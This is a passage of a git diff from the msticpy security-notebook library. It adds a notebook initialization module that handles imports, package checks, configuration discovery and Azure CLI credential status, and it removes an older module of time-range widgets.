-    plt.show()
-    return plt
+        sid_info.append(f"&nbsp;&nbsp;SID {sid} is local machine or domain account")
+    return sid_info
diff --git a/msticpy/nbtools/nbinit.py b/msticpy/nbtools/nbinit.py
new file mode 100644
index 000000000..3224545bd
--- /dev/null
+++ b/msticpy/nbtools/nbinit.py
@@ -0,0 +1,749 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Initialization for Jupyter Notebooks."""
+import importlib
+import io
+import os
+import sys
+import traceback
+import warnings
+from contextlib import redirect_stdout
+from functools import wraps
+from pathlib import Path
+from typing import Any, Callable, Dict, List, Optional, Tuple
+
+import ipywidgets as widgets
+import pandas as pd
+import yaml
+from IPython.core.interactiveshell import InteractiveShell
+from IPython.display import HTML, display
+from matplotlib import MatplotlibDeprecationWarning
+
+try:
+    import seaborn as sns
+except ImportError:
+    sns = None
+
+from .._version import VERSION
+from ..common.azure_auth_core import check_cli_credentials, AzureCliStatus
+from ..common.check_version import check_version
+from ..common.exceptions import MsticpyException, MsticpyUserError
+from ..common.pkg_config import get_config, validate_config
+from ..common.utility import (
+    check_and_install_missing_packages,
+    check_kwargs,
+    is_ipython,
+    md,
+    search_for_file,
+    unit_testing,
+)
+from ..config import MpConfigFile
+from ..datamodel.pivot import Pivot
+from .azure_ml_tools import check_versions as check_versions_aml
+from .azure_ml_tools import is_in_aml
+from .user_config import load_user_defaults
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+_IMPORT_ERR_MSSG = """
+<h2><font color='red'>One or more missing packages detected</h2>
+Please correct these by installing the required packages, restart
+the kernel and re-run the notebook.</font>
+<i>Package error: {err}</i><br>
+"""
+
+_IMPORT_MODULE_MSSG = """
+<font color='red'>Error import module {module}</font>
+"""
+
+_MISSING_PKG_WARN = """
+<h3><font color='orange'>Warning {package} is not installed or has an
+incorrect version</h3></font>
+"""
+
+_HELP_URIS = [
+    (
+        '<li><a href="https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/'
+        'A%20Getting%20Started%20Guide%20For%20Azure%20Sentinel%20ML%20Notebooks.ipynb"'
+        'target="_blank" rel="noopener noreferrer">'
+        "Getting Started (notebook)</a></li>"
+    ),
+    (
+        '<li><a href="https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/'
+        'ConfiguringNotebookEnvironment.ipynb"'
+        'target="_blank" rel="noopener noreferrer">'
+        "Configuring your Notebook environment (notebook)</a></li>"
+    ),
+    (
+        '<li><a href="https://msticpy.readthedocs.io/en/latest/getting_started/'
+        'msticpyconfig.html"'
+        'target="_blank" rel="noopener noreferrer">'
+        "Configuring MSTICPy settings (doc)</a></li>"
+    ),
+    (
+        '<li><a href="https://msticpy.readthedocs.io/en/latest/getting_started/'
+        'SettingsEditor.html"'
+        'target="_blank" rel="noopener noreferrer">'
+        "MSTICPy settings editor (doc)</a></li>"
+    ),
+    (
+        '<li><a href="https://github.com/Azure/Azure-Sentinel-Notebooks/blob/'
+        'master/TroubleShootingNotebooks.ipynb"'
+        'target="_blank" rel="noopener noreferrer">'
+        "Trouble-Shooting Notebooks (notebook)</a></li>"
+    ),
+]
+
+_MISSING_MPCONFIG_ENV_ERR = f"""
+<h3><font color='orange'>Warning: no <i>msticpyconfig.yaml</i> found</h3></font>
+The MSTICPYCONFIG environment variable is set but does not point
+to a valid file.<br>
+Some functionality (such as Threat Intel lookups) will not function without
+valid configuration settings.<br>
+The following resources will help you set up your configuration:
+<ul>{"".join(_HELP_URIS)}</ul>
+<br>You can load and run the first two of these from the Microsoft Sentinel
+<b>Notebooks</b> tab
+"""
+
+
+_PANDAS_REQ_VERSION = (0, 25, 0)
+
+
+def _get_verbosity_setting() -> Callable[[Optional[int]], int]:
+    """Closure for holding trace setting."""
+    _verbosity = 1
+
+    def _verbose(verbosity: Optional[int] = None) -> int:
+        nonlocal _verbosity
+        if verbosity is not None:
+            _verbosity = verbosity
+        return _verbosity
+
+    return _verbose
+
+
+_VERBOSITY: Callable[[Optional[int]], int] = _get_verbosity_setting()
+
+_NB_IMPORTS = [
+    dict(pkg="pandas", alias="pd"),
+    dict(pkg="IPython", tgt="get_ipython"),
+    dict(pkg="IPython.display", tgt="display"),
+    dict(pkg="IPython.display", tgt="HTML"),
+    dict(pkg="IPython.display", tgt="Markdown"),
+    dict(pkg="ipywidgets", alias="widgets"),
+    dict(pkg="pathlib", tgt="Path"),
+    dict(pkg="matplotlib.pyplot", alias="plt"),
+    dict(pkg="matplotlib", tgt="MatplotlibDeprecationWarning"),
+    dict(pkg="numpy", alias="np"),
+]
+if sns is not None:
+    _NB_IMPORTS.append(dict(pkg="seaborn", alias="sns"))
+
+_MP_IMPORTS = [
+    dict(pkg="msticpy"),
+    dict(pkg="msticpy.data", tgt="QueryProvider"),
+    dict(pkg="msticpy.nbtools.foliummap", tgt="FoliumMap"),
+    dict(pkg="msticpy.common.utility", tgt="md"),
+    dict(pkg="msticpy.common.utility", tgt="md_warn"),
+    dict(pkg="msticpy.common.wsconfig", tgt="WorkspaceConfig"),
+    dict(pkg="msticpy.datamodel.pivot", tgt="Pivot"),
+    dict(pkg="msticpy.datamodel", tgt="entities"),
+    dict(pkg="msticpy.vis", tgt="mp_pandas_plot"),
+]
+_MP_IMPORT_ALL = [
+    dict(module_name="msticpy.nbtools"),
+    dict(module_name="msticpy.sectools"),
+]
+
+_CONF_URI = (
+    "https://msticpy.readthedocs.io/en/latest/getting_started/msticpyconfig.html"
+)
+
+_AZNB_GUIDE = (
+    "Please run the <i>Getting Started Guide for Azure Sentinel "
+    + "ML Notebooks</i> notebook."
+)
+_AZ_CLI_WIKI_URI = (
+    "https://github.com/Azure/Azure-Sentinel-Notebooks/wiki/"
+    "Caching-credentials-with-Azure-CLI"
+)
+_CLI_WIKI_MSSG_GEN = (
+    f"For more information see <a href='{_AZ_CLI_WIKI_URI}'>"
+    "Caching credentials with Azure CLI</>"
+)
+_CLI_WIKI_MSSG_SHORT = (
+    f"see <a href='{_AZ_CLI_WIKI_URI}'>Caching credentials with Azure CLI</>"
+)
+
+current_providers: Dict[str, Any] = {}  # pylint: disable=invalid-name
+
+
+def _pr_output(*args):
+    """Output to IPython display or print."""
+    if not _VERBOSITY():
+        return
+    if is_ipython():
+        display(HTML(" ".join([*args, "<br>"]).replace("\n", "<br>")))
+    else:
+        print(*args)
+
+
+def _err_output(*args):
+    """Output to IPython display or print - always output regardless of verbosity."""
+    if is_ipython():
+        display(HTML(" ".join([*args, "<br>"]).replace("\n", "<br>")))
+    else:
+        print(*args)
+
+
+def init_notebook(
+    namespace: Dict[str, Any],
+    def_imports: str = "all",
+    additional_packages: List[str] = None,
+    extra_imports: List[str] = None,
+    **kwargs,
+) -> bool:
+    """
+    Initialize the notebook environment.
+
+    Parameters
+    ----------
+    namespace : Dict[str, Any]
+        Namespace (usually globals()) into which imports
+        are to be populated.
+    def_imports : str, optional
+        Import default packages. By default "all".
+        Possible values are:
+        - "all" - import all packages
+        - "nb" - import common notebook packages
+        - "msticpy" - import msticpy packages
+        - "none" (or any other value) don't load any default packages.
+    additional_packages : List[str], optional
+        Additional packages to be pip installed,
+        by default None.
+        Packages are specified by name only or version
+        specification (e.g. "pandas>=0.25")
+    user_install : bool, optional
+        Install packages in the "user" rather than system site-packages.
+        Use this option if you cannot or do not want to update the system
+        packages.
+        You should usually avoid using this option with standard Conda environments.
+    extra_imports : List[str], optional
+        Additional import definitions, by default None.
+        Imports are specified as up to 3 comma-delimited values
+        in a string:
+        "{source_pkg}, [{import_tgt}], [{alias}]"
+        `source_pkg` is mandatory - equivalent to a simple "import xyz"
+        statement.
+        `{import_tgt}` specifies an object to import from the package
+        equivalent to "from source_pkg import import_tgt"
+        `alias` allows renaming of the imported object - equivalent to
+        the "as alias" part of the import statement.
+        If you want to provide just `source_pkg` and `alias` include
+        an additional placeholder comma: e.g. "pandas, , pd"
+    friendly_exceptions : Optional[bool]
+        Setting this to True causes msticpy to hook the notebook
+        exception hander. Any exceptions derived from MsticpyUserException
+        are displayed but do not produce a stack trace, etc.
+        Defaults to system/user settings if no value is supplied.
+    verbose : Union[int, bool], optional
+        Controls amount if status output, by default 1
+        0 = No output
+        1 or False = Brief output (default)
+        2 or True = Detailed output
+    no_config_check : bool, optional
+        Skip the check for valid configuration. Default is False.
+    verbosity : int, optional
+
+
+    Returns
+    -------
+    bool
+        True if successful
+
+    Raises
+    ------
+    MsticpyException
+        If extra_imports data format is incorrect.
+        If package with required version check has no version
+        information.
+
+    """
+    global current_providers  # pylint: disable=global-statement, invalid-name
+
+    check_kwargs(
+        kwargs,
+        [
+            "user_install",
+            "friendly_exceptions",
+            "no_config_check",
+            "verbosity",
+            "verbose",
+        ],
+    )
+    user_install: bool = kwargs.pop("user_install", False)
+    friendly_exceptions: Optional[bool] = kwargs.pop("friendly_exceptions", None)
+    no_config_check: bool = kwargs.pop("no_config_check", False)
+
+    _set_verbosity(**kwargs)
+
+    _pr_output("<hr><h4>Starting Notebook initialization...</h4>")
+    # Check Azure ML environment
+    if is_in_aml():
+        check_versions_aml(*_get_aml_globals(namespace))
+    else:
+        # If not in AML check and print version status
+        stdout_cap = io.StringIO()
+        with redirect_stdout(stdout_cap):
+            check_version()
+            _pr_output(stdout_cap.getvalue())
+
+    # Handle required packages and imports
+    _pr_output("Processing imports....")
+    imp_ok = _global_imports(
+        namespace, additional_packages, user_install, extra_imports, def_imports
+    )
+
+    # Configuration check
+    if no_config_check:
+        conf_ok = True
+    else:
+        _pr_output("Checking configuration....")
+        conf_ok = _get_or_create_config()
+        _check_azure_cli_status()
+
+    # Notebook options
+    _pr_output("Setting notebook options....")
+    _set_nb_options(namespace)
+
+    # Set friendly exceptions
+    if friendly_exceptions is None:
+        friendly_exceptions = get_config("msticpy.FriendlyExceptions")
+    if friendly_exceptions:
+        if _VERBOSITY() == 2:  # type: ignore
+            _pr_output("Friendly exceptions enabled.")
+        InteractiveShell.showtraceback = _hook_ipython_exceptions(
+            InteractiveShell.showtraceback
+        )
+
+    # load pivots
+    stdout_cap = io.StringIO()
+    with redirect_stdout(stdout_cap):
+        _load_pivots(namespace=namespace)
+        _pr_output(stdout_cap.getvalue())
+
+    # User defaults
+    stdout_cap = io.StringIO()
+    with redirect_stdout(stdout_cap):
+        prov_dict = load_user_defaults()
+        _pr_output(stdout_cap.getvalue())
+
+    if prov_dict:
+        namespace.update(prov_dict)
+        current_providers = prov_dict
+        _pr_output("Autoloaded components:", ", ".join(prov_dict.keys()))
+
+    # show any warnings
+    init_status = _show_init_warnings(imp_ok, conf_ok)
+    _pr_output("<h4>Notebook initialization complete</h4>")
+    return init_status
+
+
+def _show_init_warnings(imp_ok, conf_ok):
+    if imp_ok and conf_ok:
+        return True
+    md("<font color='orange'><h3>Notebook setup completed with some warnings.</h3>")
+    if not imp_ok:
+        md("One or more libraries did not import successfully.")
+        md(_AZNB_GUIDE)
+    if not conf_ok:
+        md("One or more configuration items were missing or set incorrectly.")
+        md(
+            _AZNB_GUIDE
+            + f" and the <a href='{_CONF_URI}'>msticpy configuration guide</a>."
+        )
+    md("This notebook may still run but with reduced functionality.")
+    return False
+
+
+def _set_verbosity(**kwargs):
+    """Set verbosity of output from boolean or int `verbose` param."""
+    verbosity = 1
+    verb_param = kwargs.pop("verbose", kwargs.pop("verbosity", 1))
+    if isinstance(verb_param, bool):
+        verbosity = 2 if verb_param else 1
+    elif isinstance(verb_param, int):
+        verbosity = min(2, max(0, verb_param))
+    _VERBOSITY(verbosity)
+
+
+def list_default_imports():
+    """List the default imports for `init_notebook`."""
+    for imp_group in (_NB_IMPORTS, _MP_IMPORTS):
+        for imp_item in imp_group:
+            if "tgt" in imp_item:
+                import_line = f"from {imp_item['pkg']} import {imp_item['tgt']}"
+            else:
+                import_line = f"import {imp_item['pkg']}"
+            if "alias" in imp_item:
+                import_line += f" as {imp_item['alias']}"
+            _pr_output(import_line)
+    for imp_item in _MP_IMPORT_ALL:
+        _pr_output(f"from {imp_item['module_name']} import *")
+
+
+def _extract_pkg_name(
+    imp_pkg: Optional[Dict[str, str]] = None,
+    pkg: str = None,
+    tgt: str = None,
+    alias: str = None,
+) -> str:
+    """Return string representation of package import."""
+    if imp_pkg:
+        pkg = imp_pkg.get("pkg")
+        tgt = imp_pkg.get("tgt")
+        alias = imp_pkg.get("alias")
+    import_item = f"{pkg}.{tgt}" if tgt else pkg
+    if alias:
+        import_item = f"{alias} ({import_item})"
+    return import_item  # type: ignore
+
+
+PY_VER_VAR = "REQ_PYTHON_VER"
+MP_VER_VAR = "REQ_MSTICPY_VER"
+MP_EXTRAS = "REQ_MP_EXTRAS"
+
+
+def _get_aml_globals(namespace: Dict[str, Any]):
+    """Return global values if found."""
+    py_ver = namespace.get(PY_VER_VAR, "3.6")
+    mp_ver = namespace.get(MP_VER_VAR, __version__)
+    extras = namespace.get(MP_EXTRAS)
+    return py_ver, mp_ver, extras
+
+
+def _global_imports(
+    namespace: Dict[str, Any],
+    additional_packages: List[str] = None,
+    user_install: bool = False,
+    extra_imports: List[str] = None,
+    def_imports: str = "all",
+):
+    import_list = []
+    imports, imports_all = _build_import_list(def_imports)
+
+    try:
+        for imp_pkg in imports:
+            _imp_from_package(nm_spc=namespace, **imp_pkg)
+            import_list.append(_extract_pkg_name(imp_pkg))
+        for imp_pkg in imports_all:
+            _imp_module_all(nm_spc=namespace, **imp_pkg)
+            import_list.append(_extract_pkg_name(imp_pkg))
+        _check_and_reload_pkg(namespace, pd, _PANDAS_REQ_VERSION, "pd")
+
+        if additional_packages:
+            pkg_success = check_and_install_missing_packages(
+                additional_packages, user=user_install
+            )
+            if not pkg_success:
+                _err_output("One or more packages failed to install.")
+                _err_output(
+                    "Please re-run init_notebook() with the parameter user_install=True."
+                )
+            # We want to force import lib to see anything that we've
+            # just installed.
+            importlib.invalidate_caches()
+        if extra_imports:
+            import_list.extend(
+                _import_extras(nm_spc=namespace, extra_imports=extra_imports)
+            )
+
+        _pr_output("Imported:", ", ".join(imp for imp in import_list if imp))
+        return True
+    except ImportError as imp_err:
+        display(HTML(_IMPORT_ERR_MSSG.format(err=imp_err)))
+        return False
+
+
+def _build_import_list(
+    def_imports: str,
+) -> Tuple[List[Dict[str, str]], List[Dict[str, str]]]:
+    imports = []
+    imports_all = []
+    if def_imports.casefold() in ["all", "nb"]:
+        imports.extend(_NB_IMPORTS)
+    if def_imports.casefold() in ["all", "msticpy"]:
+        imports.extend(_MP_IMPORTS)
+        imports_all.extend(_MP_IMPORT_ALL)
+    return imports, imports_all
+
+
+_AZ_SENT_ERRS = [
+    "Missing or empty 'AzureSentinel' section",
+    "Missing or empty 'Workspaces' key in 'AzureSentinel' section",
+]
+
+
+def _verify_no_azs_errors(errs):
+    """Verify none of the Microsoft Sentinel errors appear in `errs`."""
+    return all(az_err not in errs for az_err in _AZ_SENT_ERRS)
+
+
+def _get_or_create_config() -> bool:
+    # Cases
+    # 1. Env var set and mpconfig exists -> goto 4
+    # 2. Env var set and mpconfig file not exists - warn and continue
+    # 3. search_for_file finds mpconfig -> goto 4
+    # 4. if file and check_file_contents -> return ok
+    # 5. search_for_file(config.json)
+    # 6. If config.json -> import into mpconfig and save
+    # 7. Error - no Microsoft Sentinel config
+    mp_path = os.environ.get("MSTICPYCONFIG")
+    if mp_path and not Path(mp_path).is_file():
+        _err_output(_MISSING_MPCONFIG_ENV_ERR)
+    if not mp_path or not Path(mp_path).is_file():
+        mp_path = search_for_file("msticpyconfig.yaml", paths=[".", ".."])
+
+    if mp_path:
+        errs: List[str] = []
+        try:
+            std_out_cap = io.StringIO()
+            with redirect_stdout(std_out_cap):
+                errs, _ = validate_config(config_file=mp_path)
+            if errs:
+                _pr_output(std_out_cap.getvalue())
+            if _verify_no_azs_errors(errs):
+                # If the mpconfig has a Microsoft Sentinel config, return here
+                return True
+        # pylint: disable=broad-except
+        except Exception as err:
+            errs.append(f"Exception while checking configuration:\n{err}")
+            _pr_output(f"Exception while checking configuration:\n{type(err)} - {err}")
+            _pr_output("\n".join(traceback.format_tb(err.__traceback__)))
+            _pr_output("Please report this to msticpy@microsoft.com")
+        # pylint: enable=broad-except
+
+    # Look for a config.json
+    config_json = search_for_file("config.json", paths=[".", ".."])
+    if config_json:
+        # if we found one, use it to populate msticpyconfig.yaml
+        _populate_config_to_mp_config(mp_path, config_json)
+        return True
+
+    _pr_output("No valid configuration for Microsoft Sentinel found.")
+    return False
+
+
+def _populate_config_to_mp_config(mp_path, config_json):
+    """Populate new or existing msticpyconfig with settings from config.json."""
+    mp_path = mp_path or "./msticpyconfig.yaml"
+    mp_config_convert = MpConfigFile(file=config_json)
+    azs_settings = mp_config_convert.map_json_to_mp_ws()
+    def_azs_settings = next(
+        iter(azs_settings.get("AzureSentinel", {}).get("Workspaces", {}).values())
+    )
+    if def_azs_settings:
+        mp_config_convert.settings["AzureSentinel"]["Workspaces"][
+            "Default"
+        ] = def_azs_settings.copy()
+    mssg = f"Created '{mp_path}'' with Microsoft Sentinel settings."
+    if Path(mp_path).exists():
+        # If there is an existing file read it in
+        mp_config_text = Path(mp_path).read_text(encoding="utf-8")
+        mp_config_settings = yaml.safe_load(mp_config_text)
+        # update exist settings with the AzSent settings from config.json
+        mp_config_settings.update(mp_config_convert.settings)
+        # update MpConfigFile with the merged settings
+        mp_config_convert.settings = mp_config_settings
+        mssg = f"Updated '{mp_path}'' with Microsoft Sentinel settings."
+    # Save the file
+    mp_config_convert.save_to_file(mp_path, backup=True)
+    _pr_output(mssg)
+
+
+def _set_nb_options(namespace):
+    namespace["WIDGET_DEFAULTS"] = {
+        "layout": widgets.Layout(width="95%"),
+        "style": {"description_width": "initial"},
+    }
+
+    # Some of our dependencies (networkx) still use deprecated Matplotlib
+    # APIs - we can't do anything about it, so suppress them from view
+    warnings.simplefilter("ignore", category=MatplotlibDeprecationWarning)
+    warnings.filterwarnings("ignore", category=DeprecationWarning)
+    if sns:
+        sns.set()
+    pd.set_option("display.max_rows", 100)
+    pd.set_option("display.max_columns", 50)
+    pd.set_option("display.max_colwidth", 100)
+
+    os.environ["KQLMAGIC_LOAD_MODE"] = "silent"
+    # Kqlmagic config will use AZ CLI login if available
+    kql_config = os.environ.get("KQLMAGIC_CONFIGURATION", "")
+    if "try_azcli_login" not in kql_config:
+        kql_config = ";".join([kql_config, "try_azcli_login=True"])
+        os.environ["KQLMAGIC_CONFIGURATION"] = kql_config
+
+
+def _load_pivots(namespace):
+    """Load pivot functions."""
+    if not Pivot.current:
+        pivot = Pivot()
+        namespace["pivot"] = pivot
+
+    vt_pivot = None
+    try:
+        get_config("TIProviders.VirusTotal")
+        try:
+            vt_pivot = importlib.import_module("msticpy.sectools.vtlookupv3.vt_pivot")
+            namespace["vt_pivot"] = vt_pivot
+        except ImportError:
+            # Importing Vt3 libraries failed.
+            pass
+    except KeyError:
+        # No VT settings detected
+        pass
+    if vt_pivot:
+        vt_pivot.add_pivot_functions()
+
+
+def _import_extras(nm_spc: Dict[str, Any], extra_imports: List[str]):
+    added_imports = []
+    if isinstance(extra_imports, str):
+        extra_imports = [extra_imports]
+    for imp_spec in extra_imports:
+        params: List[Optional[str]] = [None, None, None]
+        for idx, param in enumerate(imp_spec.split(",")):
+            params[idx] = param.strip() or None
+
+        if params[0] is None:
+            raise MsticpyException(
+                f"First parameter in extra_imports is mandatory: {imp_spec}"
+            )
+        _imp_from_package(nm_spc=nm_spc, pkg=params[0], tgt=params[1], alias=params[2])
+        added_imports.append(
+            _extract_pkg_name(pkg=params[0], tgt=params[1], alias=params[2])
+        )
+    return added_imports
+
+
+def _imp_module(nm_spc: Dict[str, Any], module_name: str, alias: str = None):
+    """Import named module and assign to global alias."""
+    try:
+        mod = importlib.import_module(module_name)
+    except ImportError:
+        _err_output(_IMPORT_MODULE_MSSG.format(module=module_name))
+        return None
+    if alias:
+        nm_spc[alias] = mod
+    else:
+        nm_spc[module_name] = mod
+    if _VERBOSITY() == 2:  # type: ignore
+        _pr_output(f"{module_name} imported (alias={alias})")
+    return mod
+
+
+def _imp_module_all(nm_spc: Dict[str, Any], module_name):
+    """Import all from named module add to globals."""
+    try:
+        imported_mod = importlib.import_module(module_name)
+    except ImportError:
+        _err_output(_IMPORT_MODULE_MSSG.format(module=module_name))
+        return
+    for item in dir(imported_mod):
+        if item.startswith("_"):
+            continue
+        nm_spc[item] = getattr(imported_mod, item)
+    if _VERBOSITY() == 2:  # type: ignore
+        _pr_output(f"All items imported from {module_name}")
+
+
+def _imp_from_package(
+    nm_spc: Dict[str, Any], pkg: str, tgt: str = None, alias: str = None
+):
+    """Import object or submodule from `pkg`."""
+    if not tgt:
+        return _imp_module(nm_spc=nm_spc, module_name=pkg, alias=alias)
+    try:
+        # target could be a module
+        obj = importlib.import_module(f".{tgt}", pkg)
+    except ImportError:
+        # if not, it must be an attribute (class, func, etc.)
+        try:
+            mod = importlib.import_module(pkg)
+        except ImportError:
+            _err_output(_IMPORT_MODULE_MSSG.format(module=pkg))
+            return None
+        obj = getattr(mod, tgt)
+    if alias:
+        nm_spc[alias] = obj
+    else:
+        nm_spc[tgt] = obj
+    if _VERBOSITY() == 2:  # type: ignore
+        _pr_output(f"{tgt} imported from {pkg} (alias={alias})")
+    return obj
+
+
+def _check_and_reload_pkg(
+    nm_spc: Dict[str, Any], pkg: Any, req_version: Tuple[int, ...], alias: str = None
+):
+    """Check package version matches required version and reload."""
+    warn_mssg = []
+    pkg_name = pkg.__name__
+    if not hasattr(pkg, "__version__"):
+        raise MsticpyException(f"Package {pkg_name} has no version data.")
+    pkg_version = tuple(int(v) for v in pkg.__version__.split("."))
+    if pkg_version < req_version:
+        _err_output(_MISSING_PKG_WARN.format(package=pkg_name))
+        resp = (
+            input("Install the package now? (y/n)") if not unit_testing() else "y"
+        )  # nosec
+        if resp.casefold().startswith("y"):
+            warn_mssg.append(f"{pkg_name} was installed or upgraded.")
+            pip_ver = ".".join(str(elem) for elem in req_version)
+            pkg_spec = f"{pkg_name}>={pip_ver}"
+            check_and_install_missing_packages(required_packages=[pkg_spec], user=True)
+
+            if pkg_name in sys.modules:
+                importlib.reload(pkg)
+            else:
+                _imp_module(nm_spc, pkg_name, alias=alias)
+    if _VERBOSITY() == 2:  # type: ignore
+        _pr_output(f"{pkg_name} imported version {pkg.__version__}")
+    return warn_mssg
+
+
+def _hook_ipython_exceptions(func):
+    """Hooks the `func` and bypasses it if exception is MsticpyUserException."""
+
+    @wraps(func)
+    def showtraceback(*args, **kwargs):
+        """Replace IPython showtraceback."""
+        # extract exception type, value and traceback
+        e_type, _, _ = sys.exc_info()
+        if e_type is not None and issubclass(e_type, MsticpyUserError):
+            return None
+        # otherwise run the original hook
+        return func(*args, **kwargs)
+
+    return showtraceback
+
+
+def _check_azure_cli_status():
+    """Check for Azure CLI credentials."""
+    if not unit_testing():
+        status, message = check_cli_credentials()
+        if status == AzureCliStatus.CLI_OK:
+            _pr_output(message)
+        elif status == AzureCliStatus.CLI_NOT_INSTALLED:
+            _pr_output(
+                "Azure CLI credentials not detected." f" ({_CLI_WIKI_MSSG_SHORT})"
+            )
+        elif message:
+            _pr_output("\n".join([message, _CLI_WIKI_MSSG_GEN]))
diff --git a/msticpy/nbtools/nbwidgets.py b/msticpy/nbtools/nbwidgets.py
deleted file mode 100644
index 583fa2183..000000000
--- a/msticpy/nbtools/nbwidgets.py
+++ /dev/null
@@ -1,662 +0,0 @@
-# -------------------------------------------------------------------------
-# Copyright (c) Microsoft Corporation. All rights reserved.
-# Licensed under the MIT License. See License.txt in the project root for
-# license information.
-# --------------------------------------------------------------------------
-"""Module for pre-defined widget layouts."""
-
-import json
-from json import JSONDecodeError
-import os
-import re
-from datetime import datetime, timedelta
-from enum import Enum
-from typing import Callable
-
-import pandas as pd
-from IPython.display import display
-import ipywidgets as widgets
-from ipywidgets import Layout
-
-from . import kql as qry
-from .query_defns import QueryParamProvider
-from .utility import export
-from .. _version import VERSION
-
-__version__ = VERSION
-__author__ = 'Ian Hellen'
-
-
-class TimeUnit(Enum):
-    """Time unit enumeration and value."""
-
-    sec = 1
-    min = 60
-    hour = 60 * 60
-    day = 60 * 60 * 24
-
-
-def _parse_time_unit(unit_str: str) -> TimeUnit:
-    """Return the TimeUnit enum matching the input string."""
-    if unit_str.startswith('m'):
-        return TimeUnit.min
-    if unit_str.startswith('h'):
-        return TimeUnit.hour
-    if unit_str.startswith('s'):
-        return TimeUnit.sec
-    if unit_str.startswith('d'):
-        return TimeUnit.day
-    return TimeUnit.min
-
-
-@export
-class Lookback(QueryParamProvider):
-    """
-    ipwidget wrapper to display integer slider.
-
-    Attributes:
-        lookback: the time value of the slider
-        value: synonym for lookback
-
-    """
-
-    def __init__(self, default: int = 4, label: str = 'Select time ({units}) to look back',
-                 origin_time: datetime = None, min_value: int = 1, max_value: int = 240,
-                 units: str = 'hour', auto_display: bool = False):
-        """
-        Create an instance of the lookback slider widget.
-
-            :param default=4: Default value.
-            :param label='Select time (hrs) to look back': prompt string
-            :param min_value=1: Minimum value of range.
-            :param max_value=240: Maximum value of range.
-            :param origin_time: The time from which to calculate the lookback offset
-        """
-        # default to now
-        self.origin_time = datetime.utcnow() if origin_time is None else origin_time
-
-        self._time_unit = _parse_time_unit(units)
-        if '{units}' in label:
-            label = label.format(units=self._time_unit)
-        self._lookback_wgt = widgets.IntSlider(value=default,
-                                               min=min_value,
-                                               max=max_value,
-                                               step=1,
-                                               description=label,
-                                               layout=Layout(
-                                                   width='60%', height='50px'),
-                                               style={'description_width': 'initial'})
-
-        self.end = datetime.utcnow
-        self._time_unit = _parse_time_unit(units)
-        self.start = self.end - timedelta(self._time_unit * self._lookback_wgt.value)
-
-        self._lookback_wgt.observe(self._time_range_change, names='value')
-
-        if auto_display:
-            self.display()
-
-    def display(self):
-        """Display the interactive widgets."""
-        display(self._lookback_wgt)
-
-    @property
-    def lookback(self):
-        """Return current widget lookback value."""
-        return self._lookback_wgt.value
-
-    @property
-    def value(self):
-        """Return current widget lookback value."""
-        return self._lookback_wgt.value
-
-    def _time_range_change(self, change):
-        del change
-        self.start = (self.origin_time +
-                      timedelta(0, self._lookback_wgt.value[0] * self._time_unit.value))
-        self.end = (self.origin_time +
-                    timedelta(0, self._lookback_wgt.value[1] * self._time_unit.value))
-
-    @property
-    def query_params(self):
-        """
-        Query parameters derived from alert.
-
-        Returns:
-            dict(str, str) -- Dictionary of parameter names
-
-        """
-        return {
-            'start': self.start,
-            'end': self.end
-        }
-
-
-@export
-class QueryTime(QueryParamProvider):
-    """
-    QueryTime.
-
-    Composite widget to capture date and time origin
-    and set start and end times for queries.
-
-    Atrributes:
-        start: the selected query start time
-        end: the selected query end time
-
-    """
-
-    _label_style = {'description_width': 'initial'}
-
-    def __init__(self, origin_time: datetime = None, before: int = 60, after: int = 10,
-                 max_before: int = 600, max_after: int = 100, label: str = None,
-                 units: str = 'min', auto_display: bool = False):
-        """
-        Create new instance of QueryTime.
-
-            :param origin_time:datetime=None: The starting time for the time range widget
-            defaults to datetime.utcnow()
-            :param before=60: The default start time offset from origin_time
-            :param after=10: The default end time offset from origin_time
-            :param max_before=600: The maximum offset value for the start time range
-            :param max_after=100: The maximum offset value for the end time range
-            :param label=None: override the default label 'Set query time boundaries'
-            :param units='min: time unit to use ('min', 'hour', 'sec', 'day')
-        """
-        self._label = 'Set query time boundaries' if label is None else label
-        self._time_unit = _parse_time_unit(units)
-
-        max_before = abs(max_before)
-        max_after = abs(max_after)
-        before = abs(before)
-        after = abs(after)
-        if max_before < before:
-            before = max_before
-        if max_after < after:
-            after = max_after
-
-        # default to now
-        self.origin_time = datetime.utcnow() if origin_time is None else origin_time
-        # Calculate time offsets from origin
-        self._query_start = self.origin_time - \
-            timedelta(0, before * self._time_unit.value)
-        self._query_end = self.origin_time + \
-            timedelta(0, after * self._time_unit.value)
-
-        # Create widgets
-        self._w_origin_dt = widgets.DatePicker(description='Origin Date',
-                                               disabled=False,
-                                               value=self.origin_time.date())
-        self._w_origin_tm = widgets.Text(description='Time (24hr)',
-                                         disabled=False,
-                                         value=str(self.origin_time.time()))
-
-        range_desc = 'Time Range ({}):'.format(self._time_unit.name)
-        self._w_tm_range = widgets.IntRangeSlider(value=[-before, after],
-                                                  min=-max_before,
-                                                  max=max_after,
-                                                  step=1,
-                                                  description=range_desc,
-                                                  disabled=False,
-                                                  continuous_update=True,
-                                                  orientation='horizontal',
-                                                  readout=True, readout_format='d',
-                                                  layout=Layout(width='80%'),
-                                                  style=self._label_style)
-
-        self._w_start_time_txt = widgets.Text(value=self._query_start.isoformat(sep=' '),
-                                              description='Query start time (UTC):',
-                                              layout=Layout(width='50%'),
-                                              style=self._label_style)
-        self._w_end_time_txt = widgets.Text(value=self._query_end.isoformat(sep=' '),
-                                            description='Query end time (UTC) :  ',
-                                            layout=Layout(width='50%'),
-                                            style=self._label_style)
-
-        self._w_tm_range.observe(self._time_range_change, names='value')
-        self._w_origin_dt.observe(self._update_origin, names='value')
-        self._w_origin_tm.observe(self._update_origin, names='value')
-
-        if auto_display:
-            self.display()
-
-    def display(self):
-        """Display the interactive widgets."""
-        display(widgets.HTML('<h4>{}</h4>'.format(self._label)))
-        display(widgets.HBox([self._w_origin_dt, self._w_origin_tm]))
-        display(widgets.VBox([self._w_tm_range,
-                              self._w_start_time_txt,
-                              self._w_end_time_txt]))
-
-    # pylint: disable=locally-disabled, W0613
-    def _update_origin(self, change):
-        try:
-            tm_value = datetime.strptime(
-                self._w_origin_tm.value, '%H:%M:%S.%f').time()
-            self.origin_time = datetime.combine(
-                self._w_origin_dt.value, tm_value)
-            self._time_range_change(change=None)
-        except ValueError:
-            pass
-
